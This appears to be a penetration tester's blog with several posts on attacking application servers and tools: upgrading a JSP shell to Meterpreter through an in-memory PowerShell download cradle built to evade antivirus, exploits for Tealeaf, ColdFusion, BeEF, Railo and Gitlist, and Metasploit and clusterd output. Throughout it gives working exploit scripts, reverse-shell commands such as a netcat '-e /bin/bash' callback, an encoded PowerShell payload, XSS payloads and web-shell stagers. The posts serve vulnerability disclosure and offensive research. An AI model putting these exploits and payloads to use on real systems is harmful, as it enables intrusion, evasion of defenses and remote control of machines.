This isn’t a real introduction post, just a note that I’m migrating from Google Blogger to Github Pages with Octopress. So far it’s great. I’m going to be slowly migrating all posts over from Blogger into here, though I may skip a few early posts that aren’t as interesting.
Hopefully it provides me with the functionality that I’ve been looking for.
One of my primary goals during development of clusterd was ensuring reliability and covertness during remote deploys. It’s no secret that antivirus routinely eats vanilla meterpreter shells. For this, the --gen-payload flag generates a war file with java/jsp_shell_reverse_tcp tucked inside. This is used due to it being largely undetected by AV, and our environments are perfectly suited for it. However, Meterpreter is a fantastic piece of software, and it’d be nice to be able to elevate from this simple JSP shell into it.
Metasploit has a solution for this, sort of. sessions -u can be used to upgrade an existing shell session into a full-blown Meterpreter. Unfortunately, the current implementation uses Rex::Exploitation::CmdStagerVBS, which writes the executable to disk and executes it. This is almost always immediately popped by most enterprise-grade (and even most consumer grade) AV’s. For this, we need a new solution.
The easiest solution is Powershell; this allows us to execute shellcode completely in-memory, without ever bouncing files against disk. I used Obscure Security’s canonical post on it for my implementation. The only problem really is portability, as Powershell doesn’t exist on Windows XP. This could be mitigated by patching in shellcode via Java, but that’s another post for another time.
Right, so how’s this work? We essentially execute a Powershell command in the running session (our generic shell) that fetches a payload from a remote server and executes it. Our payload in this case is Invoke-Shellcode, from the PowerSploit package. This bit of code will generate our reverse HTTPS meterpreter shell and inject it into the current process ID. Our command looks like this:
IEX, or Invoke-Expression, is just an eval operation. In this case, we’re fetching a URL and executing it. This is a totally transparent, completely in-memory solution. Let’s have a look at it running:
12345678910
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 192.168.1.6:4444 -> 192.168.1.102:60911 (192.168.1.102)
msf exploit(handler) >
We see above that we currently have a generic shell (it’s the java/jsp_shell_reverse_tcp payload) on a Windows 7 system (which happens to be running MSE). Using this new script, we can upgrade this session to Meterpreter:
12345678910111213141516171819202122
msf exploit(handler) > sessions -u 1
[*] Started HTTPS reverse handler on https://0.0.0.0:53568/
[*] Starting the payload handler...
[*] 192.168.1.102:60922 Request received for /INITM...
[*] 192.168.1.102:60922 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 2 opened (192.168.1.6:53568 -> 192.168.1.102:60922) at 2014-03-11 23:09:36 -0600
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : BRYAN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter >
And just like that, without a peep from MSE, we’ve got a Meterpreter shell.
You can find the code for this implementation below, though be warned; this is PoC quality code, and probably even worse as I’m not really a Ruby developer. Meatballs over at Metasploit has a few awesome Powershell pull requests waiting for a merge. Once this is done, I can implement that here and submit a proper implementation. If you’d like to try this out, simply create a backup copy of scripts/shell/spawn_meterpreter.rb and copy in the following, then reload. You should be upgradin’ and bypassin’ in no time.
#
# Session upgrade using Powershell IEX
#
# Some code stolen from jduck's original implementation
#
# -drone
#
class HTTPServer
#
# Using Ruby HTTPServer here since this isn't a module, and I can't figure
# out how to use MSF libs in here
#
@sent = false
def state
return @sent
end
def initialize(port, body)
require 'socket'
@sent = false
@server = Thread.new do
server = TCPServer.open port
loop do
client = server.accept
content_type = "text/plain"
client.puts "HTTP/1.0 200 OK\r\nContent-type: #{content_type}"\
"\r\nContent-Length: #{body.length}\r\n\r\n#{body}"\
"\r\n\r\n"
sleep 5
client.close
kill
end
end
end
def kill!
@sent = true
@server.kill
end
alias :kill :kill!
end
#
# Returns if a port is used by a session
#
def is_port_used?(port)
framework.sessions.each do |sid, obj|
local_info = obj.instance_variable_get(:@local_info)
return true if local_info =~ /:#{port}$/
end
false
end
def start_http_service(port)
@server = HTTPServer.new(port, @pl)
end
def wait_payload
waited = 0
while (not @server.state)
select(nil, nil, nil, 1)
waited += 1
if (waited > 10) # MAGIC NUMBA
@server.kill
raise RuntimeError, "No payload requested"
end
end
end
def generate(host, port, sport)
require 'net/http'
script_block = "iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')" % [host, sport]
cmd = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol %s" % script_block
# generate powershell payload
url = URI.parse('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
req = Net::HTTP::Get.new(url.path)
http = Net::HTTP.new(url.host, url.port)
http.use_ssl = true
res = http.request(req)
if !res or res.code != '200'
raise RuntimeError, "Could not retrieve Invoke-Shellcode"
end
@pl = res.body
@pl << "\nInvoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force" % [host, port]
return cmd
end
#
# Mimics what MSF already does if the user doesn't manually select a payload and lhost
#
lhost = framework.datastore['LHOST']
unless lhost
lhost = Rex::Socket.source_address
end
#
# If there is no LPORT defined in framework, then pick a random one that's not used
# by current sessions. This is possible if the user assumes module datastore options
# are the same as framework datastore options.
#
lport = framework.datastore['LPORT']
unless lport
lport = 4444 # Default meterpreter port
while is_port_used?(lport)
# Pick a port that's not used
lport = [*49152..65535].sample
end
end
# do the same from above, but for the server port
sport = [*49152..65535].sample
while is_port_used?(sport)
sport = [*49152..65535].sample
end
# maybe we want our sessions going to another instance?
use_handler = true
use_handler = nil if (session.exploit_datastore['DisablePayloadHandler'] == true)
#
# Spawn the handler if needed
#
aborted = false
begin
mh = nil
payload_name = 'windows/meterpreter/reverse_https'
if (use_handler)
mh = framework.modules.create("exploit/multi/handler")
mh.datastore['LPORT'] = lport
mh.datastore['LHOST'] = lhost
mh.datastore['PAYLOAD'] = payload_name
mh.datastore['ExitOnSession'] = false
mh.datastore['EXITFUNC'] = 'process'
mh.exploit_simple(
'LocalInput' => session.user_input,
'LocalOutput' => session.user_output,
'Payload' => payload_name,
'RunAsJob' => true)
# It takes a little time for the resources to get set up, so sleep for
# a bit to make sure the exploit is fully working. Without this,
# mod.get_resource doesn't exist when we need it.
select(nil, nil, nil, 0.5)
if framework.jobs[mh.job_id.to_s].nil?
raise RuntimeError, "Failed to start multi/handler - is it already running?"
end
end
# Generate our command and payload
cmd = generate(lhost, lport, sport)
# start http service
start_http_service(sport)
sleep 2 # give it a sec to startup
# execute command
session.run_cmd(cmd)
if not @server.state
# wait...
wait_payload
end
rescue ::Interrupt
# TODO: cleanup partial uploads!
aborted = true
rescue => e
print_error("Error: #{e}")
aborted = true
end
#
# Stop the job
#
if (use_handler)
Thread.new do
if not aborted
# Wait up to 10 seconds for the session to come in..
select(nil, nil, nil, 10)
end
framework.jobs.stop_job(mh.job_id)
end
end
Update 09/06/2014
Tom Sellers submitted a PR on 05/29 that implements the above nicely. It appears to support a large swath of platforms, but only a couple support no-disk-write methods, namely the Powershell method.
Tealeaf Technologies was purchased by IBM in May of 2012, and is a customer buying analytics application. Essentially, an administrator will configure a Tealeaf server that accepts analytic data from remote servers, which it then generates various models, graphs, reports, etc based on the aggregate of data.
Their analytics status/server monitoring application is vulnerable to a fairly trivial OS command injection vulnerability, as well as local file inclusion. This vulnerability was discovered on a PCI engagement against a large retailer; the LFI was used to pull PHP files and hunt for RCE.
The entire application is served up by default on port 8080 and is developed in PHP. Authentication by default is disabled, however, support for Basic Auth appears to exist. This interface allows administrators access to statistics, logs, participating servers, and more. Contained therein is the ability to obtain application logs, such as configuration, maintenance, access, and more. The log parameter is vulnerable to LFI:
12345678910111213141516171819
if(array_key_exists("log", $params))
$path = $config->logfiledir() . "/" . $params["log"];
$file = basename($path);
$size = filesize($path);
// Set the cache-control and expiration date so that the file expires
// immediately after download.
//
$rfc1123date = gmdate('D, d M Y H:i:s T', 1);
header('Cache-Control: max-age=0, must-revalidate, post-check=0, pre-check=0');
header("Expires: " . $rfc1123date);
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$file;");
header("Content-Length: $size;");
readfile($path);
The URL then is http://host:8080/download.php?log=../../../etc/passwd
Tealeaf also suffers from a rather trivial remote OS command injection vulnerability. Under the Delivery tab, there exists the option to ping remote servers that send data back to the mothership. Do you see where this is going?
function shell_command_output($command) {
$result = `$command 2>&1`;
if (strlen($result) > 0)
return $result;
}
Harnessing the $host variable, we can inject arbitrary commands to run under the context of the process user, which by default is ctccap. In order to exploit this without hanging processes or goofing up flow, I injected the following as the host variable: 8.8.8.8 -c 1 ; whoami ; ping 8.8.8.8 -c 1.
Timeline
11/08/2013: IBM vulnerability submitted
11/09/2013: IBM acknowledge vulnerability and assign internal advisory ID
12/05/2013: Request for status update
01/06/2014: Second request for status update
01/23/2014: IBM responds with a target patch date set for “another few months”
03/26/2014: IBM posts advisory, assigns CVE-2013-6719 and CVE-2013-6720
ColdFusion has several very popular LFI’s that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser use of this LFI, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left?
The less-than-obvious solution is to exploit CFML’s parser, which acts much in the same way that PHP does when used in HTML. You can embed PHP into any HTML page, at any location, because of the way the PHP interpreter searches a document for executable code. This is the foundational basis of log poisoning. CFML acts in much the same way, and we can use these LFI’s to inject CFML and execute it on the remote system.
Let’s begin by first identifying the LFI; I’ll be using ColdFusion 8 as example. CF8’s LFI lies in the locale parameter:
When exploited, this will dump the contents of application.log, a logging file that stores error messages.
We can write to this file by triggering an error, such as attempting to access a nonexistent CFML page. This log also fails to sanitize data, allowing us to inject any sort of characters we want; including CFML code.
The idea for this is to inject a simple stager payload that will then pull down and store our real payload; in this case, a web shell (something like fuze). The stager I came up with is as follows:
The cfhttp tag is used to execute an HTTP request for our real payload, the URL of which is base64’d to avoid some encoding issues with forward slashes. We then expand the local path to ../../ which drops us into wwwroot, which is the first directory accessible from the web server.
Once the stager is injected, we only need to exploit the LFI to retrieve the log file and execute our CFML code:
Which we can then access from the root directory:
A quick run of this in clusterd:
1234567891011121314151617
$ ./clusterd.py -i 192.168.1.219 -a coldfusion -p8500 -v8 --deployer lfi_stager --deploy ./src/lib/resources/cmd.cfml
clusterd/0.2.1 - clustered attack toolkit
[Supporting 5 platforms]
[2014-04-02 11:28PM] Started at 2014-04-02 11:28PM
[2014-04-02 11:28PM] Servers' OS hinted at windows
[2014-04-02 11:28PM] Fingerprinting host '192.168.1.219'
[2014-04-02 11:28PM] Server hinted at 'coldfusion'
[2014-04-02 11:28PM] Checking coldfusion version 8.0 ColdFusion Manager...
[2014-04-02 11:28PM] Matched 1 fingerprints for service coldfusion
[2014-04-02 11:28PM] ColdFusion Manager (version 8.0)
[2014-04-02 11:28PM] Fingerprinting completed.
[2014-04-02 11:28PM] Injecting stager...
[2014-04-02 11:28PM] Waiting for remote server to download file [7s]]
[2014-04-02 11:28PM] cmd.cfml deployed at /cmd.cfml
[2014-04-02 11:28PM] Finished at 2014-04-02 11:28PM
The downside to this method is remnance in a log file, which cannot be purged unless the CF server is shutdown (except in CF10). It also means that the CFML file, if using the web shell, will be hanging around the filesystem. An alternative is to inject a web shell that exists on-demand, that is, check if an argument is provided to the LFI and only parse and execute then.
A working deployer for this can be found in the latest release of clusterd (v0.2.1). It is also worth noting that this method is applicable to other CFML engines; details on that, and a working proof of concept, in the near future.
Let me preface this post by saying that this vulnerability is already fixed, and was caught pretty early during the development process. The vulnerability was originally introduced during a merge for the new DNS extension, and was promptly patched by antisnatchor on 03022014. Although this vulnerability was caught fairly quickly, it still made it into the master branch. I post this only because I’ve seen too many penetration testers leaving their tools externally exposed, often with default credentials.
The vulnerability is a trivial one, but is capable of returning a reverse shell to an attacker. BeEF exposes a REST API for modules and scripts to use; useful for dumping statistics, pinging hooked browsers, and more. It’s quite powerful. This can be accessed by simply pinging http://127.0.0.1:3000/api/ and providing a valid token. This token is static across a single session, and can be obtained by sending a POST to http://127.0.0.1:3000/api/admin/login with appropriate credentials. Default credentials are beef:beef, and I don’t know many users that change this right away. It’s also of interest to note that the throttling code does not exist in the API login routine, so a brute force attack is possible here.
The vulnerability lies in one of the exposed API functions, /rule. The code for this was as follows:
12345678910111213141516171819
# Adds a new DNS rule
post '/rule' do
begin
body = JSON.parse(request.body.read)
pattern = body['pattern']
type = body['type']
response = body['response']
# Validate required JSON keys
unless [pattern, type, response].include?(nil)
# Determine whether 'pattern' is a String or Regexp
begin
pattern_test = eval pattern
pattern = pattern_test if pattern_test.class == Regexp
# end
rescue => e;
end
The obvious flaw is the eval on user-provided data. We can exploit this by POSTing a new DNS rule with a malicious pattern:
import requests
import json
import sys
def fetch_default(ip):
url = 'http://%s:3000/api/admin/login' % ip
headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
data = { 'username' : 'beef', 'password' : 'beef' }
response = requests.post(url, headers=headers, data=json.dumps(data))
if response.status_code is 200 and json.loads(response.content)['success']:
return json.loads(response.content)['token']
try:
ip = '192.168.1.6'
if len(sys.argv) > 1:
token = sys.argv[1]
else:
token = fetch_default(ip)
if not token:
print 'Could not get auth token'
sys.exit(1)
url = 'http://%s:3000/api/dns/rule?token=%s' % (ip, token)
sploit = '%x(nc 192.168.1.97 4455 -e /bin/bash)'
headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
data = { 'pattern' : sploit,
'type' : 'A',
'response' : [ '127.0.0.1' ]
}
response = requests.post(url, headers=headers, data=json.dumps(data))
print response.status_code
except Exception, e:
print e
You could execute ruby to grab a shell, but BeEF restricts some of the functions we can use (such as exec or system).
There’s also an instance of LFI, this time using the server API. /api/server/bind allows us to mount files at the root of the BeEF web server. The path defaults to the current path, but can be traversed out of:
We can then hit our server at /tmp.txt for /etc/passwd. Though this appears to be intended behavior, and perhaps labeling it an LFI is a misnomer, it is still yet another example of why you should not expose these tools externally with default credentials. Default credentials are just bad, period. Stop it.
Railo is an open-source alternative to the popular Coldfusion application server, implementing a FOSSy CFML engine and application server. It emulates Coldfusion in a variety of ways, mainly features coming straight from the CF world, along with several of it’s own unique features (clustered servers, a plugin architecture, etc). In this four-part series, we’ll touch on how Railo, much like Coldfusion, can be used to gain access to a system or network of systems. I will also be examining several pre-authentication RCE vulnerabilities discovered in the platform during this audit. I’ll be pimping clusterd throughout to exemplify how it can help achieve some of these goals. These posts are the result of a combined effort between myself and Stephen Breen (@breenmachine).
I’ll preface this post with a quick rundown on what we’re working with; public versions of Railo run from versions 3.0 to 4.2, with 4.2.1 being the latest release as of posting. The code is also freely available on Github; much of this post’s code samples have been taken from the 4.2 branch or the master. Hashes:
Railo has two separate administrative web interfaces; server and web. The two interfaces segregate functionality out into these categories; managing the actual server and managing the content served up by the server. Server is available at http://localhost:8888/railo-context/admin/server.cfm and web is available at http://localhost:8888/railo-context/admin/web.cfm. Both interfaces are configured with a single, shared password that is set AFTER the site has been initialized. That is, the first person to hit the web server gets to choose the password.
Authentication
As stated, authentication requires only a single password, but locks an IP address out if too many failed attempts are performed. The exact logic for this is as follows (web.cfm):
123
<cfif loginPause and StructKeyExists(application,'lastTryToLogin') and IsDate(application.lastTryToLogin) and DateDiff("s",application.lastTryToLogin,now()) LT loginPause>
<cfset login_error="Login disabled until #lsDateFormat(DateAdd("s",loginPause,application.lastTryToLogin))# #lsTimeFormat(DateAdd("s",loginPause,application.lastTryToLogin),'hh:mm:ss')#">
<cfelse>
A Remember Me For setting allows an authenticated session to last until logout or for a specified amount of time. In the event that a cookie is saved for X amount of time, Railo actually encrypts the user’s password and stores it as the authentication cookie. Here’s the implementation of this:
That’s right; a static key, defined as <cfset cookieKey="sdfsdf789sdfsd">, is used as the key to the CFMX_COMPAT encryption algorithm for encrypting and storing the user’s password client-side. This is akin to simply base64’ing the password, as symmetric key security is dependant upon the secrecy of this shared key.
To then verify authentication, the cookie is decrypted and compared to the current password (which is also known; more on this later):
1234567
<cfif not StructKeyExists(session,"password"&request.adminType) and StructKeyExists(cookie,'railo_admin_pw_#ad#')>
<cfset fromCookie=true>
<cftry>
<cfset session["password"&ad]=Decrypt(cookie['railo_admin_pw_#ad#'],cookieKey,"CFMX_COMPAT","hex")>
<cfcatch></cfcatch>
</cftry>
</cfif>
For example, if my stored cookie was RAILO_ADMIN_PW_WEB=6802AABFAA87A7, we could decrypt this with a simple CFML page:
This would dump my plaintext password (which, in this case, is “default”). This ups the ante with XSS, as we can essentially steal plaintext credentials via this vector. Our cookie is graciously set without HTTPOnly or Secure: Set-Cookie: RAILO_ADMIN_PW_WEB=6802AABFAA87A7;Path=/;Expires=Sun, 08-Mar-2015 06:42:31 GMT._
Another worthy mention is the fact that the plaintext password is stored in the session struct, as shown below:
In order to dump this, however, we’d need to be able to write a CFM file (or code) within the context of web.cfm. As a test, I’ve placed a short CFM file on the host and set the error handler to invoke it. test.cfm:
1
<cfdump var="#session#">
We then set the template handler to this file:
If we now hit a non-existent page, /railo-context/xx.cfm for example, we’ll trigger the cfm and get our plaintext password:
XSS
XSS is now awesome, because we can fetch the server’s plaintext password. Is there XSS in Railo?
Submitting to a CFM with malicious arguments triggers an error and injects unsanitized input.
Post-authentication search:
Submitting malicious input into the search bar will effectively sanitize out greater than/less than signs, but not inside of the saved form. Injecting "></form><img src=x onerror=alert(document.cookie)> will, of course, pop-up the cookie.
How about stored XSS?
A malicious mapping will trigger whenever the page is loaded; the only caveat being that the path must start with a /, and you cannot use the script tag. Trivial to get around with any number of different tags.
Speaking of, let’s take a quick look at the sanitization routines. They’ve implemented their own routines inside of ScriptProtect.java, and it’s a very simple blacklist:
123
public static final String[] invalids=new String[]{
"object", "embed", "script", "applet", "meta", "iframe"
};
They iterate over these values and perform a simple compare, and if a bad tag is found, they simply replace it:
It doesn’t take much to evade this filter, as I’ve already described.
CSRF kinda fits in here, how about CSRF? Fortunately for users, and unfortunately for pentesters, there’s not much we can do. Although Railo does not enforce authentication for CFML/CFC pages, it does check read/write permissions on all accesses to the backend config file. This is configured in the Server interface:
In the above image, if Access Write was configured to open, any user could submit modifications to the back-end configuration, including password resets, task scheduling, and more. Though this is sufficiently locked down by default, this could provide a nice backdoor.
Deploying
Much like Coldfusion, Railo features a task scheduler that can be used to deploy shells. A run of this in clusterd can be seen below:
12345678910111213141516171819202122232425
$ ./clusterd.py -i192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer task --usr-auth default
clusterd/0.2.1 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-01 10:04PM] Started at 2014-05-01 10:04PM
[2014-05-01 10:04PM] Servers' OS hinted at windows
[2014-05-01 10:04PM] Fingerprinting host '192.168.1.219'
[2014-05-01 10:04PM] Server hinted at 'railo'
[2014-05-01 10:04PM] Checking railo version 4.1 Railo Server...
[2014-05-01 10:04PM] Checking railo version 4.1 Railo Server Administrator...
[2014-05-01 10:04PM] Checking railo version 4.1 Railo Web Administrator...
[2014-05-01 10:04PM] Matched 3 fingerprints for service railo
[2014-05-01 10:04PM] Railo Server (version 4.1)
[2014-05-01 10:04PM] Railo Server Administrator (version 4.1)
[2014-05-01 10:04PM] Railo Web Administrator (version 4.1)
[2014-05-01 10:04PM] Fingerprinting completed.
[2014-05-01 10:04PM] This deployer (schedule_task) requires an external listening port (8000). Continue? [Y/n] >
[2014-05-01 10:04PM] Preparing to deploy cmd.cfml..
[2014-05-01 10:04PM] Creating scheduled task...
[2014-05-01 10:04PM] Task cmd.cfml created, invoking...
[2014-05-01 10:04PM] Waiting for remote server to download file [8s]]
[2014-05-01 10:04PM] cmd.cfml deployed to /cmd.cfml
[2014-05-01 10:04PM] Cleaning up...
[2014-05-01 10:04PM] Finished at 2014-05-01 10:04PM
This works almost identically to the Coldfusion scheduler, and should not be surprising.
One feature Railo has that isn’t found in Coldfusion is the Extension or Plugin architecture; this allows custom extensions to run in the context of the Railo server and execute code and tags. These extensions do not have access to the cfadmin tag (without authentication, that is), but we really don’t need that for a simple web shell. In the event that the Railo server is configured to not allow outbound traffic (hence rendering the Task Scheduler useless), this could be harnessed instead.
Railo allows extensions to be uploaded directly to the server, found here:
Developing a plugin is sort of confusing and not exacty clear via their provided Github documentation, however the simplest way to do this is grab a pre-existing package and simply replace one of the functions with a shell.
That about wraps up part one of our dive into Railo security; the remaining three parts will focus on several different vulnerabilities in the Railo framework, and how they can be lassoed together for pre-authentication RCE.
Gitlist is a fantastic repository viewer for Git; it’s essentially your own private Github without all the social networking and glitzy features of it. I’ve got a private Gitlist that I run locally, as well as a professional instance for hosting internal projects. Last year I noticed a bug listed on their Github page that looked a lot like an exploitable hole:
1
Oops! sh: 1: Syntax error: EOF in backquote substitution
I commented on its exploitability at the time, and though the hole appears to be closed, the issue still remains. I returned to this during an install of Gitlist and decided to see if there were any other bugs in the application and, as it turns out, there are a few. I discovered a handful of bugs during my short hunt that I’ll document here, including one anonymous remote code execution vulnerability that’s quite trivial to pop. These bugs were reported to the developers and CVE-2014-4511 was assigned. These issues were fixed in version 0.5.0.
The first bug is actually more of a vulnerability in a library Gitlist uses, Gitter (same developers). Gitter allows developers to interact with Git repositories using Object-Oriented Programming (OOP). During a quick once-over of the code, I noticed the library shelled out quite a few times, and one in particular stood out to me:
This can be found in Repository.php of the Gitter library, and is invoked from TreeController.php in Gitlist. As you can imagine, there is no sanitization on the $branch variable. This essentially means that anyone with commit access to the repository can create a malicious branch name (locally or remotely) and end up executing arbitrary commands on the server.
The tricky part comes with the branch name; git actually has a couple restrictions on what can and cannot be part of a branch name. This is all defined and checked inside of refs.c, and the rules are simply defined as (starting at line 33):
With these restrictions in mind, we can begin crafting our payload.
My first thought was, because Gitlist is written in PHP, to drop a web shell. To do so we must print our payload out to a file in a location accessible to the web root. As it so happens, we have just the spot to do it. According to INSTALL.md, the following is required:
123
cd /var/www/gitlist
mkdir cache
chmod 777 cache
This is perfect; we have a reliable location with 777 permissions and it’s accessible from the web root (/gitlist/cache/my_shell.php). Second step is to come up with a payload that adheres to the Git branch rules while still giving us a shell. What I came up with is as follows:
In order to inject PHP, we need the <? and ?> headers, so we need to encode our PHP payload. We use the $IFS environment variable (Internal Field Separator) to plug in our spaces and echo the base64’d shell into base64 for decoding, then pipe that into our payload location.
And it works flawlessly.
Though you might say, “Hey if you have commit access it’s game over”, but I’ve seen several instances of this not being the case. Commit access does not necessarily equate to shell access.
The second vulnerability I discovered was a trivial RCE, exploitable by anonymous users without any access. I first noticed the bug while browsing the source code, and ran into this:
Knowing how often they shell out, and the complete lack of input sanitization, I attempted to pop this by trivially evading the double quotes and injecting grave accents:
This post continues our dive into Railo security, this time introducing several post-authentication RCE vulnerabilities discovered in the platform. As stated in part one of this series, like ColdFusion, there is a task scheduler that allows authenticated users the ability to write local files. Whilst the existence of this feature sets it as the standard way to shell a Railo box, sometimes this may not work. For example, in the event of stringent firewall rules, or irregular file permissions, or you’d just prefer not to make remote connections, the techniques explored in this post will aid you in this manner.
PHP has an interesting, ahem, feature, where it writes out session information to a temporary file located in a designated path (more). If accessible to an attacker, this file can be used to inject PHP data into, via multiple different vectors such as a User-Agent or some function of the application itself. Railo does sort of the same thing for its Web and Server interfaces, except these files are always stored in a predictable location. Unlike PHP however, the name of the file is not simply the session ID, but is rather a quasi-unique value generated using a mixture of pseudo-random and predictable/leaked information. I’ll dive into this here in a bit.
When a change to the interface is made, or a new page bookmark is created, Railo writes this information out to a session file located at /admin/userdata/. The file is then either created, or an existing one is used, and will be named either web-[value].cfm or server-[value].cfm depending on the interface you’re coming in from. It’s important to note the extension on these files; because of the CFM extension, these files will be parsed by the CFML interpreter looking for CF tags, much like PHP will do. A typical request to add a new bookmark is as follows:
1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=server.request HTTP/1.1
The favorite server.request is then written out to a JSON-encoded array object in the session file, as below:
Whilst our injected data is written to the file, astute readers will note the double # around our Coldfusion variable. This is ColdFusion’s way of escaping a number sign, and will therefore not reflect our command output back into the page. To my knowledge, there is no way to obtain shell output without the use of the variable tags.
We have two options for popping this: inject a command to return a shell or inject a web shell that simply writes output to a file that is then accessible from the web root. I’ll start with the easiest of the two, which is injecting a command to return a shell.
I’ll use PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell into the Railo process. Because Railo will also quote our single/double quotes, we need to base64 the Invoke-Expression payload:
1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=%3A%3Ccfoutput%3E%3Ccfexecute%20name%3D%22c%3A%5Cwindows%5Csystem32%5Ccmd.exe%22%20arguments%3D%22%2Fc%20PowerShell.exe%20-Exec%20ByPass%20-Nol%20-Enc%20aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkA%22%20timeout%3D%2210%22%20variable%3D%22output%22%3E%3C%2Fcfexecute%3E%3C%2Fcfoutput%3E%27 HTTP/1.1
Once injected, we hit our session page and pop a shell:
12345678910111213141516171819202122232425
payload => windows/meterpreter/reverse_https
LHOST => 192.168.1.6
LPORT => 4444
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.1.102:50122 Request received for /INITM...
[*] 192.168.1.102:50122 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.102:50122) at 2014-03-24 00:44:20 -0600
meterpreter > getpid
Current pid: 5064
meterpreter > getuid
Server username: bryan-PC\bryan
meterpreter > sysinfo
Computer : BRYAN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter >
Because I’m using Powershell, this method won’t work in Windows XP or Linux systems, but it’s trivial to use the next method for that (net user/useradd).
The second method is to simply write out the result of a command into a file and then retrieve it. This can trivially be done with the following:
1
':<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir > ./webapps/www/WEB-INF/railo/context/output.cfm" timeout="10" variable="output"></cfexecute></cfoutput>'
Note that we’re writing out to the start of web root and that our output file is a CFM; this is a requirement as the web server won’t serve up flat files or txt’s.
Great, we’ve verfied this works. Now, how to actually figure out what the hell this session file is called? As previously noted, the file is saved as either web-[VALUE].cfm or server-[VALUE].cfm, the prefix coming from the interface you’re accessing it from. I’m going to step through the code used for this, which happens to be a healthy mix of CFML and Java.
We’ll start by identifying the session file on my local Windows XP machine: web-a898c2525c001da402234da94f336d55.cfm. This is stored in www\WEB-INF\railo\context\admin\userdata, of which admin\userdata is accessible from the web root, that is, we can directly access this file by hitting railo-context/admin/userdata/[file] from the browser.
When a favorite it saved, internal.savedata.cfm is invoked and searches through the given list for the function we’re performing:
This function actually reads in our data file, inserts our new favorite into the data array, and writes it back down. Our question is “how do you know the file?”, so naturally we need to head into loadData:
At last we’ve reached the apparent event horizon of this XML black hole; we see the return will be of form web-#getrailoid()[web].id#, substituting in web for request.admintype.
I’ll skip some of the digging here, but lets fast forward to Admin.java:
Here we return the ID of the caller (our ID, for reference, is what we’re currently tracking down!), which calls down into config.getId:
1234567
@Override
public String getId() {
if(id==null){
id = getId(getSecurityKey(),getSecurityToken(),false,securityKey);
}
return id;
}
Here we invoke getId which, if null, calls down into an overloaded getId which takes a security key and a security token, along with a boolean (false) and some global securityKey value. Here’s the function in its entirety:
123456789101112
public static String getId(String key, String token,boolean addMacAddress,String defaultValue) {
try {
if(addMacAddress){// because this was new we could swutch to a new ecryption // FUTURE cold we get rid of the old one?
return Hash.sha256(key+";"+token+":"+SystemUtil.getMacAddress());
}
return Md5.getDigestAsString(key+token);
}
catch (Throwable t) {
return defaultValue;
}
}
Our ID generation is becoming clear; it’s essentially the MD5 of key + token, the key being returned from getSecurityKey and the token coming from getSecurityToken. These functions are simply getters for private global variables in the ConfigImpl class, but tracking down their generation is fairly trivial. All state initialization takes place in ConfigWebFactory.java. Let’s first check out the security key:
Okay, so our key is a randomly generated UUID from the safehaus library. This isn’t very likely to be guessed/brute-forced, but the value is written to a file in a consistent place. We’ll return to this.
The second value we need to calculate is the security token, which is set in ConfigImpl:
Gah! This is predictable/leaked! The token is simply the MD5 of our configuration directory, which in my case is C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo So let’s see if this works.
We MD5 the directory (20132193c7031326cab946ef86be8c74), then prefix this with the random UUID (securityKey) to finally get:
Ah-ha! Our session file will then be web-a898c2525c001da402234da94f336d55.cfm, which exactly lines up with what we’re seeing:
I mentioned that the config directory is leaked; default Railo is pretty promiscuous:
As you can see, from this we can derive the base configuration directory and figure out one half of the session filename. We now turn our attention to figuring out exactly what the securityKey is; if we recall, this is a randomly generated UUID that is then written out to a file called id.
There are two options here; one, guess or predict it, or two, pull the file with an LFI. As alluded to in part one, we can set the error handler to any file on the system we want. As we’re in the mood to discuss post-authentication issues, we can harness this to fetch the required id file containing this UUID:
When we then access a non-existant page, we trigger the template and the system returns our file:
By combining these specific vectors and inherit weaknesses in the Railo architecture, we can obtain post-authentication RCE without forcing the server to connect back. This can be particularly useful when the Task Scheduler just isn’t an option. This vulnerability has been implemented into clusterd as an auxiliary module, and is available in the latest dev build (0.3.1). A quick example of this:
